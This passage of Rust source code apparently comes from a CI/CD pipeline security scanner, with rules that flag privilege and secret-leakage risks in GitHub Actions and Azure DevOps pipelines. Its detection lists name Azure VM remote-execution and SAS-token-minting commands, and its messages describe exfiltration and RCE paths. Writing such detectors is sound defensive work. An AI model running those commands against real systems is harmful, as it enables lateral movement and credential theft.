                    for &(n, _) in &stack[cycle_start_idx..] {
                        cycle_nodes.insert(n);
                    }
                } else if color[neighbor] == 0 {
                    color[neighbor] = 1;
                    stack.push((neighbor, 0));
                }
            } else {
                // All out-edges explored — retire the node.
                color[node_id] = 2;
                stack.pop();
            }
        }
    }
    if cycle_nodes.is_empty() {
        return Vec::new();
    }
    // BTreeSet iteration yields cycle members in ascending NodeId order.
    vec![Finding {
        severity: Severity::High,
        category: FindingCategory::AuthorityCycle,
        path: None,
        nodes_involved: cycle_nodes.into_iter().collect(),
        message:
            "Circular delegation detected — workflow calls itself transitively, creating unbounded privilege escalation paths"
                .into(),
        recommendation: Recommendation::Manual {
            action: "Break the delegation cycle — a workflow must not directly or transitively call itself".into(),
        },
        source: FindingSource::BuiltIn,
        extras: FindingExtras::default(),
    }]
}
/// Rule: privileged workflow (OIDC/federated identity) with no provenance attestation step.
///
/// Only fires for graphs that actually use OIDC/federated identity (an
/// Identity node carrying `META_OIDC = "true"`). If no node anywhere in the
/// graph carries `META_ATTESTS = "true"`, emit a single Info finding listing
/// the steps with HasAccessTo an OIDC identity.
pub fn uplift_without_attestation(graph: &AuthorityGraph) -> Vec<Finding> {
    // Scope: the rule is meaningless without at least one OIDC-capable Identity.
    let oidc_identity_ids: Vec<NodeId> = graph
        .nodes_of_kind(NodeKind::Identity)
        .filter(|n| matches!(n.metadata.get(META_OIDC), Some(v) if v == "true"))
        .map(|n| n.id)
        .collect();
    if oidc_identity_ids.is_empty() {
        return Vec::new();
    }
    // An attestation step anywhere in the graph satisfies the rule.
    if graph
        .nodes
        .iter()
        .any(|n| matches!(n.metadata.get(META_ATTESTS), Some(v) if v == "true"))
    {
        return Vec::new();
    }
    // Steps with HasAccessTo an OIDC identity, deduped in first-seen order.
    let mut steps_using_oidc: Vec<NodeId> = Vec::new();
    for edge in graph.edges.iter().filter(|e| e.kind == EdgeKind::HasAccessTo) {
        if oidc_identity_ids.contains(&edge.to) && !steps_using_oidc.contains(&edge.from) {
            steps_using_oidc.push(edge.from);
        }
    }
    if steps_using_oidc.is_empty() {
        return Vec::new();
    }
    let n = steps_using_oidc.len();
    let mut nodes_involved = steps_using_oidc;
    nodes_involved.extend(oidc_identity_ids);
    vec![Finding {
        severity: Severity::Info,
        category: FindingCategory::UpliftWithoutAttestation,
        path: None,
        nodes_involved,
        message: format!(
            "{n} step(s) use OIDC/federated identity but no provenance attestation step was detected — artifact integrity cannot be verified"
        ),
        recommendation: Recommendation::Manual {
            action: "Add 'actions/attest-build-provenance' after your build step (GHA) to provide SLSA provenance. See https://docs.github.com/en/actions/security-guides/using-artifact-attestations".into(),
        },
        source: FindingSource::BuiltIn,
        extras: FindingExtras::default(),
    }]
}
/// Rule: step writes to the environment gate ($GITHUB_ENV / ##vso[task.setvariable]).
///
/// Authority leaking through the environment gate propagates to subsequent steps
/// outside the explicit graph edges. Severity:
/// - Untrusted step: Critical (attacker-controlled values inject into pipeline env)
/// - Step with secret/identity access: High (secrets may leak into env)
/// - Otherwise: Medium (still a propagation risk)
pub fn self_mutating_pipeline(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Only steps explicitly marked as writing the env gate participate.
        let writes_gate =
            matches!(step.metadata.get(META_WRITES_ENV_GATE), Some(v) if v == "true");
        if !writes_gate {
            continue;
        }
        // Authority (secrets/identities) the step holds via HasAccessTo.
        let authority_nodes: Vec<&_> = graph
            .edges_from(step.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.to))
            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
            .collect();
        let is_untrusted = step.trust_zone == TrustZone::Untrusted;
        let has_authority = !authority_nodes.is_empty();
        // Severity and message graduate together on the same two facts:
        // trust zone first, held authority second.
        let (severity, message) = if is_untrusted {
            (
                Severity::Critical,
                format!(
                    "Untrusted step '{}' writes to the environment gate — attacker-controlled values can inject into subsequent steps' environment",
                    step.name
                ),
            )
        } else if has_authority {
            let authority_label: Vec<String> =
                authority_nodes.iter().map(|n| n.name.clone()).collect();
            (
                Severity::High,
                format!(
                    "Step '{}' writes to the environment gate while holding authority ({}) — secrets may leak into pipeline environment",
                    step.name,
                    authority_label.join(", ")
                ),
            )
        } else {
            (
                Severity::Medium,
                format!(
                    "Step '{}' writes to the environment gate — values can propagate into subsequent steps' environment",
                    step.name
                ),
            )
        };
        let mut nodes_involved = vec![step.id];
        nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
        findings.push(Finding {
            severity,
            category: FindingCategory::SelfMutatingPipeline,
            path: None,
            nodes_involved,
            message,
            recommendation: Recommendation::Manual {
                action: "Avoid writing secrets or attacker-controlled values to $GITHUB_ENV / $GITHUB_PATH / pipeline variables. Use explicit step outputs with narrow scoping instead.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Rule: PR-triggered pipeline performs a self checkout.
///
/// A PR/PRT-triggered pipeline that checks out the repository puts
/// attacker-controlled fork code on the runner, where every subsequent step
/// that reads workspace files (almost all of them) can exfiltrate secrets or
/// tamper with artifacts. Only fires when the graph carries a PR-class trigger.
pub fn checkout_self_pr_exposure(graph: &AuthorityGraph) -> Vec<Finding> {
    // Gate on a PR-class trigger in the graph metadata.
    let trigger = graph
        .metadata
        .get(META_TRIGGER)
        .map(|s| s.as_str())
        .unwrap_or("");
    if trigger != "pr" && trigger != "pull_request_target" {
        return Vec::new();
    }
    // One finding per step flagged with META_CHECKOUT_SELF = "true".
    graph
        .nodes_of_kind(NodeKind::Step)
        .filter(|step| {
            step.metadata
                .get(META_CHECKOUT_SELF)
                .map_or(false, |v| v == "true")
        })
        .map(|step| Finding {
            category: FindingCategory::CheckoutSelfPrExposure,
            severity: Severity::High,
            message: format!(
                "PR-triggered pipeline checks out the repository at step '{}' — attacker-controlled code from the fork lands on the runner and is readable by all subsequent steps",
                step.name
            ),
            path: None,
            nodes_involved: vec![step.id],
            recommendation: Recommendation::Manual {
                action: "Use `persist-credentials: false` and avoid reading workspace files in subsequent privileged steps. Consider `checkout: none` for jobs that only need pipeline config, not source code.".into(),
            },
            source: FindingSource::BuiltIn,
            // Separating privileged work from PR-checkout jobs is a real
            // restructure, not a one-line change — Medium effort.
            extras: FindingExtras {
                time_to_fix: Some(crate::finding::FixEffort::Medium),
                ..FindingExtras::default()
            },
        })
        .collect()
}
/// Rule: ADO variable group consumed by a PR-triggered job.
///
/// Variable groups hold secrets scoped to pipelines. A PR-triggered step with
/// `HasAccessTo` a Secret/Identity node carrying `META_VARIABLE_GROUP = "true"`
/// moves those secrets into an untrusted-contributor execution context.
pub fn variable_group_in_pr_job(graph: &AuthorityGraph) -> Vec<Finding> {
    // Gate on a PR-class trigger.
    let trigger = graph
        .metadata
        .get(META_TRIGGER)
        .map(|s| s.as_str())
        .unwrap_or("");
    if !matches!(trigger, "pr" | "pull_request_target") {
        return Vec::new();
    }
    let mut out = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Variable-group-backed authority nodes this step can reach.
        let mut groups = Vec::new();
        for edge in graph.edges_from(step.id) {
            if edge.kind != EdgeKind::HasAccessTo {
                continue;
            }
            let Some(node) = graph.node(edge.to) else {
                continue;
            };
            let is_authority = matches!(node.kind, NodeKind::Secret | NodeKind::Identity);
            let is_var_group = node
                .metadata
                .get(META_VARIABLE_GROUP)
                .map_or(false, |v| v == "true");
            if is_authority && is_var_group {
                groups.push(node);
            }
        }
        if groups.is_empty() {
            continue;
        }
        let group_names: Vec<&str> = groups.iter().map(|n| n.name.as_str()).collect();
        // Step first, then the variable-group nodes.
        let mut nodes_involved = vec![step.id];
        nodes_involved.extend(groups.iter().map(|n| n.id));
        out.push(Finding {
            severity: Severity::Critical,
            category: FindingCategory::VariableGroupInPrJob,
            path: None,
            nodes_involved,
            message: format!(
                "PR-triggered step '{}' accesses variable group(s) [{}] — secrets cross into untrusted PR execution context",
                step.name,
                group_names.join(", ")
            ),
            recommendation: Recommendation::CellosRemediation {
                reason: format!(
                    "PR-triggered step '{}' can exfiltrate variable group secrets via untrusted code",
                    step.name
                ),
                spec_hint: "cellos run --network deny-all --policy requireEgressDeclared,requireRuntimeSecretDelivery".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    out
}
/// Rule: self-hosted agent pool used by a PR-triggered pipeline that also checks out the repo.
///
/// All three factors present — self-hosted pool + PR trigger + `checkout:self` — combine to
/// allow an attacker to land malicious git hooks on the shared runner via a PR. Those hooks
/// persist across pipeline runs and execute with full pipeline authority.
///
/// Emits a single clustered finding whose `nodes_involved` lists the
/// self-hosted pool (Image) nodes first, then the checkout steps.
pub fn self_hosted_pool_pr_hijack(graph: &AuthorityGraph) -> Vec<Finding> {
    // Factor 1: PR-class trigger.
    let trigger = graph
        .metadata
        .get(META_TRIGGER)
        .map(|s| s.as_str())
        .unwrap_or("");
    if trigger != "pull_request_target" && trigger != "pr" {
        return Vec::new();
    }
    // Factor 2: at least one self-hosted agent pool. Collect the matching
    // Image nodes once — they serve both as the gate and as the finding's
    // node list (this previously scanned the Image nodes twice with the
    // same filter).
    let pool_nodes: Vec<&_> = graph
        .nodes_of_kind(NodeKind::Image)
        .filter(|n| {
            n.metadata
                .get(META_SELF_HOSTED)
                .map(|v| v == "true")
                .unwrap_or(false)
        })
        .collect();
    if pool_nodes.is_empty() {
        return Vec::new();
    }
    // Factor 3: at least one step performs checkout:self.
    let checkout_steps: Vec<&_> = graph
        .nodes_of_kind(NodeKind::Step)
        .filter(|n| {
            n.metadata
                .get(META_CHECKOUT_SELF)
                .map(|v| v == "true")
                .unwrap_or(false)
        })
        .collect();
    if checkout_steps.is_empty() {
        return Vec::new();
    }
    // All three factors present: self-hosted + PR trigger + checkout:self.
    let mut nodes_involved: Vec<NodeId> = pool_nodes.iter().map(|n| n.id).collect();
    nodes_involved.extend(checkout_steps.iter().map(|n| n.id));
    vec![Finding {
        severity: Severity::Critical,
        category: FindingCategory::SelfHostedPoolPrHijack,
        path: None,
        nodes_involved,
        message:
            "PR-triggered pipeline uses self-hosted agent pool with checkout:self — enables git hook injection persisting across pipeline runs on the shared runner"
                .into(),
        recommendation: Recommendation::Manual {
            action: "Run PR pipelines on Microsoft-hosted (ephemeral) agents, or disable checkout:self for PR-triggered jobs on self-hosted pools".into(),
        },
        source: FindingSource::BuiltIn,
        extras: FindingExtras::default(),
    }]
}
/// Rule: ADO service connection with broad/unknown scope and no OIDC federation,
/// reachable from a PR-triggered job.
///
/// Static credentials backing broad-scope service connections can carry
/// subscription-wide Azure RBAC. When a PR-triggered step has `HasAccessTo` one of
/// these, PR-author-controlled code can move laterally into the Azure tenant.
pub fn service_connection_scope_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
    let trigger = graph
        .metadata
        .get(META_TRIGGER)
        .map(|s| s.as_str())
        .unwrap_or("");
    if !matches!(trigger, "pr" | "pull_request_target") {
        return Vec::new();
    }
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // An Identity qualifies when it is a service connection, it is NOT
        // OIDC-federated, and its declared scope is broad or unknown.
        let risky_connections: Vec<&_> = graph
            .edges_from(step.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.to))
            .filter(|n| {
                if n.kind != NodeKind::Identity {
                    return false;
                }
                let is_service_connection = n
                    .metadata
                    .get(META_SERVICE_CONNECTION)
                    .map_or(false, |v| v == "true");
                // Missing META_OIDC counts as "not federated".
                let federated = n.metadata.get(META_OIDC).map_or(false, |v| v == "true");
                // Absent scope metadata is treated the same as an explicit
                // broad scope — unknown is also a risk.
                let broad_or_unknown = matches!(
                    n.metadata.get(META_IDENTITY_SCOPE).map(|s| s.as_str()),
                    Some("broad") | Some("Broad") | None
                );
                is_service_connection && !federated && broad_or_unknown
            })
            .collect();
        for sc in risky_connections {
            findings.push(Finding {
                severity: Severity::High,
                category: FindingCategory::ServiceConnectionScopeMismatch,
                path: None,
                nodes_involved: vec![step.id, sc.id],
                message: format!(
                    "PR-triggered step '{}' accesses service connection '{}' with broad/unknown scope and no OIDC federation — static credential may have subscription-wide Azure RBAC",
                    step.name, sc.name
                ),
                recommendation: Recommendation::CellosRemediation {
                    reason: "Broad-scope service connection reachable from PR code — CellOS egress isolation limits lateral movement even when connection cannot be immediately rescoped".into(),
                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared".into(),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            });
        }
    }
    findings
}
/// ADO-only rule: a `resources.repositories[]` entry resolves against a
/// mutable target — no `ref:` field (default branch) or `refs/heads/<x>`
/// without a SHA. Whoever owns that branch can inject steps into every
/// consuming pipeline at the next run.
///
/// Pinned forms that do NOT fire:
/// - `refs/tags/<x>` — git tags (treated as immutable in practice)
/// - bare 40-char hex SHA — explicit commit pin
/// - `refs/heads/<sha>` where the trailing segment is a 40-char hex SHA
///
/// Mutable forms that DO fire:
/// - field absent — defaults to the repo's default branch
/// - `refs/heads/<branch>` with a normal branch name
/// - bare branch name (`main`, `master`, `develop`, ...)
///
/// Suppression: a repository entry declared with NO `ref:` field AND no
/// in-file consumer (`extends:`, `template: x@alias`, or `checkout: alias`)
/// is skipped. This catches purely vestigial declarations — a leftover
/// `resources.repositories[]` entry that no one references is not an active
/// attack surface. An entry with an explicit `ref: refs/heads/<x>` always
/// fires regardless of in-file usage, because the explicit branch ref
/// signals an intent to consume (the consumer is typically in an included
/// template file outside the per-file scan boundary).
pub fn template_extends_unpinned_branch(graph: &AuthorityGraph) -> Vec<Finding> {
    // `META_REPOSITORIES` carries the `resources.repositories[]` list as a
    // JSON array on the graph metadata; absence means nothing to inspect.
    let raw = match graph.metadata.get(META_REPOSITORIES) {
        Some(s) => s,
        None => return Vec::new(),
    };
    // Malformed JSON is treated as "no declarations" rather than an error.
    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
        Ok(v) => v,
        Err(_) => return Vec::new(),
    };
    let mut findings = Vec::new();
    for entry in entries {
        // Entries without an alias cannot be referenced by consumers — skip.
        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
            Some(a) => a,
            None => continue,
        };
        // Display name falls back to the alias when no repo name is recorded.
        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
        let repo_type = entry
            .get("repo_type")
            .and_then(|v| v.as_str())
            .unwrap_or("git");
        let ref_value = entry.get("ref").and_then(|v| v.as_str());
        // `used` — an in-file consumer references this alias (see the
        // suppression note in the rule docs above).
        let used = entry.get("used").and_then(|v| v.as_bool()).unwrap_or(false);
        let classification = classify_repository_ref(ref_value);
        let resolved = match classification {
            // SHA- or tag-pinned refs are immutable — nothing to flag.
            RepositoryRefClass::Pinned => continue,
            RepositoryRefClass::DefaultBranch => {
                // Default-branch entries are only flagged when an in-file
                // consumer actually references the alias. Without an explicit
                // `ref:` and without a consumer there's no evidence the
                // declaration is active — likely vestigial.
                if !used {
                    continue;
                }
                "default branch (no ref:)".to_string()
            }
            RepositoryRefClass::MutableBranch(b) => format!("mutable branch '{b}'"),
        };
        // Concrete pinned replacement shown in the recommendation.
        let pinned_example = format!("ref: <40-char-sha> # commit on {name}");
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::TemplateExtendsUnpinnedBranch,
            path: None,
            nodes_involved: Vec::new(),
            message: format!(
                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) resolves to {resolved} — \
                 whoever owns that branch can inject steps at the next pipeline run"
            ),
            recommendation: Recommendation::PinAction {
                current: ref_value.unwrap_or("(default branch)").to_string(),
                pinned: pinned_example,
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// ADO-only rule: a `resources.repositories[]` entry pins to a *feature-class*
/// branch — anything outside the platform-blessed set
/// (`main`, `master`, `release/*`, `hotfix/*`).
///
/// Strictly stronger signal than [`template_extends_unpinned_branch`]:
///
/// * `template_extends_unpinned_branch` fires on *any* mutable branch ref
///   (including `main` and `master`) — the abstract "ref isn't pinned to a
///   SHA or tag" finding.
/// * This rule fires only on the subset that's *worse than main*: a developer
///   feature branch (`feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
///   `develop`, …) where push protection is typically weaker than the trunk.
///
/// The two findings co-fire intentionally — they describe different angles of
/// the same risk class. `template_extends_unpinned_branch` says "this isn't
/// pinned"; this rule adds "and the branch it points to is one any developer
/// can push to without a code review gate".
///
/// Detection inputs are identical to `template_extends_unpinned_branch`:
/// `META_REPOSITORIES` JSON array, with the same `used` suppression for
/// `ref`-absent entries.
///
/// Pinned forms (40-char SHA, `refs/tags/<x>`, `refs/heads/<sha>`) do not
/// fire — same classification helper as the parent rule.
///
/// Default-branch (no-`ref:`) entries do not fire from this rule. The default
/// branch is conventionally `main`/`master`, and even when it's something
/// else the *implicit* default-branch contract carries less risk than an
/// explicit feature-branch pin (the default branch usually has the strongest
/// protection in the org). The plain "this isn't pinned" surface is left to
/// `template_extends_unpinned_branch`.
pub fn template_repo_ref_is_feature_branch(graph: &AuthorityGraph) -> Vec<Finding> {
    // Same input as the parent rule: JSON-encoded repositories list.
    let raw = match graph.metadata.get(META_REPOSITORIES) {
        Some(s) => s,
        None => return Vec::new(),
    };
    // Malformed JSON: report nothing rather than erroring.
    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
        Ok(v) => v,
        Err(_) => return Vec::new(),
    };
    let mut findings = Vec::new();
    for entry in entries {
        // Entries without an alias cannot be referenced by consumers — skip.
        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
            Some(a) => a,
            None => continue,
        };
        // Display name falls back to the alias when no repo name is recorded.
        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
        let repo_type = entry
            .get("repo_type")
            .and_then(|v| v.as_str())
            .unwrap_or("git");
        let ref_value = entry.get("ref").and_then(|v| v.as_str());
        // Only explicit refs are candidates here — the parent rule covers the
        // ref-absent case via the default-branch path.
        let branch = match classify_repository_ref(ref_value) {
            RepositoryRefClass::MutableBranch(b) => b,
            RepositoryRefClass::Pinned | RepositoryRefClass::DefaultBranch => continue,
        };
        // Trunk/release/hotfix branches are left to the parent rule.
        if !is_feature_class_branch(&branch) {
            continue;
        }
        // Concrete pinned replacement shown in the recommendation.
        let pinned_example = format!("ref: <40-char-sha> # commit on {name}");
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::TemplateRepoRefIsFeatureBranch,
            path: None,
            nodes_involved: Vec::new(),
            message: format!(
                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) is pinned to feature-class branch '{branch}' — \
                 weaker than even an unpinned trunk pin: any developer with write access to that branch can inject pipeline steps without a code review on main"
            ),
            recommendation: Recommendation::PinAction {
                current: ref_value.unwrap_or("(default branch)").to_string(),
                pinned: pinned_example,
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Returns `true` for ADO branch names that are *not* part of the
/// platform-blessed trunk/release set. The blessed set:
///
/// - `main`, `master`
/// - `release/*`, `releases/*`
/// - `hotfix/*`, `hotfixes/*`
///
/// Everything else — `feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
/// `develop`, ad-hoc names — is treated as feature-class.
///
/// Comparison is case-insensitive and prefix-stripped of any leading
/// `refs/heads/` (the [`classify_repository_ref`] caller already strips it,
/// but defensive normalisation keeps this helper standalone-testable).
fn is_feature_class_branch(branch: &str) -> bool {
    let name = branch
        .trim()
        .trim_start_matches("refs/heads/")
        .to_ascii_lowercase();
    // Empty names and exact trunk names are not feature-class.
    if name.is_empty() || name == "main" || name == "master" {
        return false;
    }
    // Release/hotfix family: matches the exact name or any prefixed path.
    let blessed_prefixes = ["release/", "releases/", "hotfix/", "hotfixes/"];
    let blessed = blessed_prefixes
        .iter()
        .any(|p| name.starts_with(p) || name == p.trim_end_matches('/'));
    !blessed
}
// ── Command-line credential leakage helpers ─────────────
//
// These two rules (`vm_remote_exec_via_pipeline_secret`,
// `short_lived_sas_in_command_line`) inspect inline script bodies stamped on
// Step nodes by the parser as `META_SCRIPT_BODY`. They are intentionally
// heuristic — the goal is reliable detection of the corpus pattern, not 100%
// false-positive cleanliness. They're allowed to co-fire on the same step:
// each describes a different angle of the same risk class.
//
// All three token lists below are lowercase: the consuming helpers receive a
// pre-lowercased script body and do plain substring matching against it.
/// Names of the Azure VM remote-execution primitives we care about.
/// Match is case-insensitive on the script body.
const VM_REMOTE_EXEC_TOKENS: &[&str] = &[
    "set-azvmextension",
    "invoke-azvmruncommand",
    "az vm run-command",
    "az vm extension set",
];
/// Substrings that indicate a SAS token has just been minted in this script.
/// Match is case-insensitive on the script body. Covers both the Az
/// PowerShell cmdlets and the `az` CLI `generate-sas` subcommands.
const SAS_MINT_TOKENS: &[&str] = &[
    "new-azstoragecontainersastoken",
    "new-azstorageblobsastoken",
    "new-azstorageaccountsastoken",
    "az storage container generate-sas",
    "az storage blob generate-sas",
    "az storage account generate-sas",
];
/// Argument-passing keywords that put a value on the process command line and
/// thus into ARM extension status / OS process logs.
const COMMAND_LINE_SINK_TOKENS: &[&str] = &[
    "commandtoexecute",
    "scriptarguments",
    "--arguments",
    "-argumentlist",
    "--scripts",
    "-scriptstring",
];
/// Returns the names of pipeline secret/SAS variables (`$(NAME)`) that the
/// step references via `HasAccessTo` a Secret. Used to spot interpolation of
/// pipeline secrets into command-line strings. The returned slices borrow
/// from the graph's Secret nodes.
fn step_secret_var_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<&str> {
    let mut names = Vec::new();
    for edge in graph.edges_from(step_id) {
        if edge.kind != EdgeKind::HasAccessTo {
            continue;
        }
        if let Some(target) = graph.node(edge.to) {
            if target.kind == NodeKind::Secret {
                names.push(target.name.as_str());
            }
        }
    }
    names
}
/// Returns owned names of all Secret nodes a step has `HasAccessTo`.
/// Used by the script-aware ADO rules to constrain pattern matches to
/// `$(VAR)` references that actually resolve to secrets in this graph.
fn step_secret_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<String> {
    let mut names = Vec::new();
    for edge in graph.edges_from(step_id) {
        if edge.kind != EdgeKind::HasAccessTo {
            continue;
        }
        if let Some(target) = graph.node(edge.to) {
            if target.kind == NodeKind::Secret {
                names.push(target.name.clone());
            }
        }
    }
    names
}
/// Heuristic: returns true if a value-bearing variable named `var_name` appears
/// to be interpolated into `script_body` — either the ADO macro form `$(var)`
/// or the PowerShell form `$var` (where `$var` must not be followed by a
/// word character, so `$varSomething` does not count). Case-insensitive.
fn body_interpolates_var(script_body: &str, var_name: &str) -> bool {
    if var_name.is_empty() {
        return false;
    }
    let haystack = script_body.to_lowercase();
    let lowered = var_name.to_lowercase();
    // ADO macro form `$(name)` — a plain substring test suffices.
    if haystack.contains(&format!("$({lowered})")) {
        return true;
    }
    // PowerShell form `$name`: scan every occurrence and accept only those
    // not immediately followed by an identifier character.
    let probe = format!("${lowered}");
    let mut offset = 0usize;
    while let Some(hit) = haystack[offset..].find(&probe) {
        let boundary = offset + hit + probe.len();
        let followed_by_word = haystack
            .as_bytes()
            .get(boundary)
            .map_or(false, |&c| c.is_ascii_alphanumeric() || c == b'_');
        if !followed_by_word {
            return true;
        }
        offset = boundary;
    }
    false
}
/// Returns true if `script` contains `$(secret)` and that occurrence sits on
/// a line whose left-hand side looks like a shell-variable assignment:
/// - `export FOO=$(SECRET)`
/// - `FOO="$(SECRET)"`
/// - `$X = "$(SECRET)"` / `$env:X = "$(SECRET)"`
/// - `set -a` followed by an assignment is a softer signal but still flagged
///
/// Returns false when `$(secret)` is part of a command-line argument
/// (e.g. `terraform plan -var "k=$(SECRET)"`) — that's covered by other rules.
fn script_assigns_secret_to_shell_var(script: &str, secret: &str) -> bool {
    let macro_ref = format!("$({secret})");
    script.lines().any(|line| {
        // Only the text to the left of the first `$(secret)` occurrence on
        // this line matters — that's where an assignment prefix would sit.
        let Some(pos) = line.find(&macro_ref) else {
            return false;
        };
        let prefix = line[..pos].trim_start();
        // bash/sh (`export VAR=`, `VAR=`, ...) or PowerShell
        // (`$VAR = "..."`, `$env:VAR = "..."`, `Set-Variable ... -Value`).
        matches_bash_assignment(prefix) || matches_powershell_assignment(prefix)
    })
}
/// Returns true if the (pre-lowercased) `body` contains any SAS-mint command.
fn body_mints_sas(body_lower: &str) -> bool {
    for token in SAS_MINT_TOKENS {
        if body_lower.contains(token) {
            return true;
        }
    }
    false
}
/// Returns true if the (pre-lowercased) `body` names a VM remote-exec tool.
fn body_uses_vm_remote_exec(body_lower: &str) -> bool {
    for token in VM_REMOTE_EXEC_TOKENS {
        if body_lower.contains(token) {
            return true;
        }
    }
    false
}
/// Returns true if the (pre-lowercased) `body` contains a command-line sink
/// keyword (`commandToExecute`, `-ArgumentList`, ...).
fn body_has_cmdline_sink(body_lower: &str) -> bool {
    for token in COMMAND_LINE_SINK_TOKENS {
        if body_lower.contains(token) {
            return true;
        }
    }
    false
}
/// Extract names of PowerShell variables that are bound to a SAS-mint result.
/// Pattern: `$<name> = New-AzStorage...SASToken ...` (case-insensitive).
/// Returns the variable names without the leading `$`.
///
/// Implementation: a single forward byte-scan over the lowercased body —
/// find `$`, read an `[A-Za-z0-9_]+` identifier, allow spaces/tabs, require
/// `=`, then check the remainder of the physical line for a SAS-mint token.
/// Names are deduplicated case-insensitively with original casing preserved.
fn powershell_sas_assignments(body: &str) -> Vec<String> {
    let mut out = Vec::new();
    let lower = body.to_lowercase();
    let bytes = lower.as_bytes();
    let mut i = 0usize;
    while i < bytes.len() {
        if bytes[i] != b'$' {
            i += 1;
            continue;
        }
        // Read identifier
        let name_start = i + 1;
        let mut j = name_start;
        while j < bytes.len() {
            let c = bytes[j];
            if c.is_ascii_alphanumeric() || c == b'_' {
                j += 1;
            } else {
                break;
            }
        }
        // Bare `$` with no identifier (e.g. the start of `$(...)`) — move on.
        if j == name_start {
            i += 1;
            continue;
        }
        // Skip whitespace, then expect `=`
        let mut k = j;
        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
            k += 1;
        }
        if k >= bytes.len() || bytes[k] != b'=' {
            // Not an assignment — resume scanning right after the identifier.
            i = j;
            continue;
        }
        // Skip `=` and whitespace
        k += 1;
        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
            k += 1;
        }
        // Look at the rest of this logical line (until `\n`).
        let line_end = lower[k..].find('\n').map(|p| k + p).unwrap_or(bytes.len());
        let rhs = &lower[k..line_end];
        if SAS_MINT_TOKENS.iter().any(|t| rhs.contains(t)) {
            // Recover original-case variable name from `body` at the same byte
            // offsets — `lower` and `body` share UTF-8 byte layout for ASCII,
            // and identifiers in PowerShell are ASCII in the corpus.
            let name = body
                .get(name_start..j)
                .unwrap_or(&lower[name_start..j])
                .to_string();
            // Case-insensitive dedupe: `$Sas` and `$sas` are one variable.
            if !out.iter().any(|n: &String| n.eq_ignore_ascii_case(&name)) {
                out.push(name);
            }
        }
        i = j;
    }
    out
}
/// Rule: pipeline step drives an Azure VM remote-execution primitive
/// (Set-AzVMExtension/CustomScriptExtension, Invoke-AzVMRunCommand,
/// `az vm run-command invoke`, `az vm extension set`) while the executed
/// command line is built from a pipeline secret or a SAS token minted in the
/// same script body.
///
/// Pipeline-to-VM lateral movement primitive: every pipeline run can RCE every
/// VM in scope, and the SAS/secret embedded in the command line is logged in
/// plaintext on the VM and in the ARM extension status JSON.
///
/// Detection: each Step's `META_SCRIPT_BODY` must contain a remote-exec tool
/// name AND (interpolate a known pipeline secret variable OR mint a SAS token
/// in the same body). One finding per matching step.
pub fn vm_remote_exec_via_pipeline_secret(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let script = match step.metadata.get(META_SCRIPT_BODY) {
            Some(s) if !s.is_empty() => s,
            _ => continue,
        };
        let lowered = script.to_lowercase();
        if !body_uses_vm_remote_exec(&lowered) {
            continue;
        }
        // Secret nodes reachable from this step over HasAccessTo edges:
        // names feed the interpolation check, ids attribute the finding to
        // the leaked credential.
        let secrets: Vec<&_> = graph
            .edges_from(step.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.to))
            .filter(|n| n.kind == NodeKind::Secret)
            .collect();
        let interpolates_secret = secrets
            .iter()
            .any(|s| body_interpolates_var(script, &s.name));
        let mints_sas = body_mints_sas(&lowered);
        if !interpolates_secret && !mints_sas {
            continue;
        }
        // First matching tool name — used only for the message text.
        let tool = VM_REMOTE_EXEC_TOKENS
            .iter()
            .copied()
            .find(|t| lowered.contains(*t))
            .unwrap_or("Set-AzVMExtension");
        let trigger = if interpolates_secret {
            "interpolating a pipeline secret into the executed command line"
        } else {
            "embedding a freshly-minted SAS token into the executed command line"
        };
        let mut nodes_involved = vec![step.id];
        nodes_involved.extend(secrets.iter().map(|s| s.id));
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::VmRemoteExecViaPipelineSecret,
            path: None,
            nodes_involved,
            message: format!(
                "Step '{}' uses {} {} — pipeline-to-VM RCE primitive; credential is logged on the VM and in ARM extension status",
                step.name, tool, trigger
            ),
            recommendation: Recommendation::Manual {
                action: "Stage the script on the VM and pass the SAS via env var or protectedSettings (encrypted, not logged); avoid embedding secrets in commandToExecute".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Heuristic: line prefix looks like a bash/sh assignment to an env var.
/// Conservative — matches `export FOO=`, `declare FOO=`, `local FOO=`,
/// `readonly FOO=`, or plain `FOO=`, with nothing after the `=` other than
